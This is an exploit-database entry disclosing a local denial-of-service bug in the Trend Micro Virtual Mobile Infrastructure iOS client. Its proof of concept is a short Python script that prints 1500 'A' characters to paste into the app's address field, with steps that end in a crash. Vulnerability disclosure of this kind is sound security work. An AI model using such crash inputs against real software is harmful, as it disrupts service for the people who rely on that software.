id: 37522
date: 03/24/2022
title: Trend Micro Virtual Mobile Infrastructure 6.0.1278 Denial Of Service Vulnerability
author: Saud Alenazi
cves: 

# Exploit Title: Trend Micro Virtual Mobile Infrastructure (TMVMI) version 6 - Denial of Service (PoC)
# Date: 24/03/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.trendmicro.com/
# Software Link: App Store for iOS devices
# Version: 6.0.1278
# Tested: iPhone 6 iOS 12.4.7
# Vulnerability Type: Denial of Service (DoS) Local
# Contact: https://twitter.com/dmaral3noz


# Steps to Produce the Crash:
1- Run python code: TMVMI_6.py
2- Copy content to clipboard
3- Open TMVMI Client
4- Paste ClipBoard on "address"
5- Click Next
6- Crashed


------------------------- 
TMVMI_6.py
-------------------------

#!/usr/bin/env python

buffer = "\x41" * 1500
print (buffer)

#  0day.today [2023-03-23]  #